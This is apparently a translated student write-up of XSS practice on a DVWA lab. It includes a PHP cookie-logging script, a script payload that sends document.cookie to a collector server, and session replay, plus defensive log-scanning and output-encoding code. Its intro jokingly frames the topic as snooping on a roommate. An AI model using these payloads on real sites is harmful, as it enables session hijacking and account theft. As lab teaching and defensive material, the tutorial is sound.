[XSS] Practice on the DVWA platform

Source: Internet
Author: User

In class, students are required to form teams freely and prepare a security-related topic, so everyone rushes to find the top student (the "xueba") and ride on his coattails. Recently I was asked to contribute part of the slides, to hide the fact that I was really just tagging along. The idea is that one hanger-on's technical point is too slight on its own, but two hangers-on can combine their technical points into something presentable!
The previous hanger-on article is
Login session hijacking
and here is the other one.
I was speechless too. The topic I eventually settled on was how to help a classmate snoop on his roommate's personal space. Worse still, this sort of trick was supposed to be done by me! But I know nothing about web security; I just want to quietly study compilers!
So after some hesitation, I finally calmed down and got into the subject below:

Environment

Server: Apache
Database: MySQL
URL: 192.168.1.104/dvwa
Visitor: 192.168.1.113

There are many tutorials on the Internet about installing DVWA, so I will not repeat them here; search for one. Two things need attention: XAMPP port conflicts, and making the server reachable from the LAN.
Port occupation

1. Port 80 conflict. Solution:
Open httpd.conf in the directory C:\xampp\apache\conf (my installation directory is C:\xampp) and replace the 80 in "Listen 80" and "ServerName localhost:80" with 8081 or another value (try not to use ports 0-1023, which are reserved for the system).
2. Port 443 conflict. Solution:
Open httpd-ssl.conf in the directory C:\xampp\apache\conf\extra (my installation directory is C:\xampp) and either comment out "Listen 443" (#Listen 443) or change 443 to another value such as 4433 (again, try not to use a reserved port).

LAN Access

By default XAMPP only allows local access to its management directories. Comment out the "Deny from all" line in the following LocationMatch block so that the server can be reached from other hosts on the LAN:

<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
    Order deny,allow
    #Deny from all
    Allow from 127.0.0.0/8
    # Require local
    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>

Note that this also exposes phpmyadmin and the other listed paths to every host on the network, which is only acceptable in an isolated lab.

Once the environment is configured, the DVWA instance can be reached from the LAN and the attack can begin.

Reflected XSS vulnerability discovered

XSS arises wherever user input is echoed straight back into the page output. Opening the page, you will find an input box like the one below. When you enter "venidic", the browser returns exactly that data.

Right-click to view the source. No filtering is performed; the input is returned as-is:

<div class="vulnerable_code_area">
    <form name="XSS" action="#" method="GET">
        <p>What's your name?</p>
        <input type="text" name="name">
        <input type="submit" value="Submit">
    </form>
    <pre>Hello venidic </pre>
</div>

So we can use </pre> to close the preceding <pre> tag, add a trailing <pre> to pair with the original </pre>, and put the attack code in between.
Construct the test code:

</pre><script>alert('xss')</script><pre>

Test successful

Exploiting the vulnerability

XSS is usually demonstrated by popping up an alert box to confirm that the vulnerability exists, but that by itself achieves nothing. What makes XSS dangerous is that it runs in the front end: an attacker can easily execute JavaScript in the victim's browser to steal cookies, hijack user sessions, or even build an XSS worm. Since my web skills are poor, I will only cover the most basic technique, stealing cookies:

To record a visitor's cookie you need a script on the attacker's server. When the victim's browser runs the injected JavaScript, the script records the victim's cookie.
PHP script for cookie interception:

<?php
$cookie = $_GET['cookie'];                 // the cookie value passed in the GET query string
$ip = getenv('REMOTE_ADDR');               // remote host IP address
$time = date('Y-m-d g:i:s');               // time, displayed as year-month-day hour:minute:second
$referer = getenv('HTTP_REFERER');         // link source
$agent = $_SERVER['HTTP_USER_AGENT'];      // user browser type
$fp = fopen('cookie.txt', 'a');            // open cookie.txt for appending; it is created if it does not exist
fwrite($fp, "IP: " . $ip . "\nDate and Time: " . $time . "\nUser Agent: " . $agent
    . "\nReferer: " . $referer . "\nCookie: " . $cookie . "\n"); // write the record
fclose($fp);                               // close the file
header("Location: http://www.baidu.com");  // redirect to baidu to avoid detection
?>

The js attack code can be written as follows:

</pre><script>document.location = 'http://192.168.1.104/acceptcookie.php?cookie=' + document.cookie;</script><pre>


Click Submit.
The page is redirected to baidu, which shows that the attack succeeded.

Open cookie.txt in the same directory

Hijacking successful

Open the Guilin Veterans browser, set the stolen cookie, and the home page opens logged in without a password.

Exploitation successful
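From the defender's side, this attack leaves two traces in the web server's access log: the victim's request carrying the percent-encoded payload, and the victim's browser then fetching acceptcookie.php with a Cookie-shaped query parameter. The following added example (mine, not code from the original post) flags both patterns in Apache combined-format log lines; the sample lines, timestamps, paths and cookie values are constructed, and the function names are my own.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" format: client, identd, user, [time], "request", status, bytes, "referer", "ua".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Substrings that have no business in the URL-decoded query string of a normal request.
XSS_MARKERS = ("<script", "javascript:", "onerror=", "document.cookie", "document.location")
# A parameter value shaped like a Cookie header; DVWA's own cookies are PHPSESSID and security.
COOKIE_SHAPE = re.compile(r"(?i)(^|;\s*)(phpsessid|security)=[^;]+")

def analyse(line):
    """Return the findings for one log line: [] if clean, None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    decoded = unquote_plus(parts.query).lower()        # payloads arrive percent-encoded
    findings = [f"xss-marker:{s}" for s in XSS_MARKERS if s in decoded]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if COOKIE_SHAPE.search(value):                  # a session cookie leaving in a query string
            findings.append(f"cookie-exfil:{name}")
    return findings

def scan(lines):
    """Map every suspicious line to (client ip, request path, findings)."""
    hits = []
    for line in lines:
        findings = analyse(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), urlsplit(m.group("target")).path, findings))
    return hits

# Constructed sample lines (not from the original post): a normal visit, the victim loading
# the reflected payload, and the victim's browser reporting its cookie to the logger script.
SAMPLE_LOG = [
    '192.168.1.113 - - [01/Jan/2016:10:00:00 +0800] "GET /dvwa/vulnerabilities/xss_r/?name=venidic HTTP/1.1" 200 4321 "http://192.168.1.104/dvwa/" "Mozilla/5.0"',
    '192.168.1.113 - - [01/Jan/2016:10:00:05 +0800] "GET /dvwa/vulnerabilities/xss_r/?name=%3C%2Fpre%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.1.104%2Facceptcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E%3Cpre%3E HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
    '192.168.1.113 - - [01/Jan/2016:10:00:06 +0800] "GET /acceptcookie.php?cookie=security%3Dlow%3B%20PHPSESSID%3Dconstructed0123456789 HTTP/1.1" 302 0 "http://192.168.1.104/dvwa/vulnerabilities/xss_r/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, findings)
```

The second pattern is the more useful alert in practice: a session identifier appearing inside a query string is abnormal regardless of how the script got into the page.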

Stored XSS vulnerability discovered

Browsing on, I find a guest book (message board).

Fill it in as prompted; again no filtering is performed.

Attack code
Message:

<script>alert('xss')</script>

Submit

Triggered successfully. Log out of the website.
Now, acting as the website administrator, I go to the site management page on the server.

It triggers there too. Viewed as an ordinary visitor's message board, it also triggers.

Exploiting the vulnerability

Exploitation works the same way as before: the simplest and most flexible approach is again to steal cookies with the same payload.
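Both findings above, the reflected "Hello <name>" echo and the stored guest book, share one root cause: user input is written into the HTML without output encoding. As an added illustration (my own Python model, not code from the original post or from DVWA), here is the unencoded output beside an output-encoded version, checked against the two payloads used in this article; the function and class names are my own.

```python
import html
import re

def render_greeting_vulnerable(name):
    """Mirrors the low-security page: input is concatenated straight into the HTML."""
    return f"<pre>Hello {name} </pre>"

def render_greeting_fixed(name):
    """Same markup, but the value is encoded for the HTML text context before output."""
    return f"<pre>Hello {html.escape(name, quote=True)} </pre>"

class GuestBook:
    """Stored XSS model: a message is saved once and rendered to every later reader
    (other visitors and the administrator alike)."""
    def __init__(self):
        self.entries = []

    def post(self, name, message):
        # Store the raw text; encoding belongs at the output boundary, not at input.
        self.entries.append((name, message))
        return self

    def render(self, encode_output):
        rows = []
        for name, message in self.entries:
            if encode_output:
                name, message = html.escape(name, quote=True), html.escape(message, quote=True)
            rows.append(f"<div>Name: {name}<br>Message: {message}</div>")
        return "\n".join(rows)

# Crude reviewer check on rendered output: is a live <script> tag still present?
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def contains_live_script(fragment):
    return SCRIPT_TAG.search(fragment) is not None

# The two payloads used in the article.
REFLECTED_PAYLOAD = "</pre><script>alert('xss')</script><pre>"
STORED_PAYLOAD = "<script>alert('xss')</script>"

if __name__ == "__main__":
    print(render_greeting_vulnerable(REFLECTED_PAYLOAD))   # the </pre> breakout works
    print(render_greeting_fixed(REFLECTED_PAYLOAD))        # rendered as literal text
    book = GuestBook().post("test", STORED_PAYLOAD)
    print(contains_live_script(book.render(encode_output=False)))  # True
    print(contains_live_script(book.render(encode_output=True)))   # False
```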

Afterword

The coattail-riding task is over now. I hope the xueba's talk goes smoothly! Don't let the review I gave up before exam week, and the late nights spent preparing this thing, go to waste!

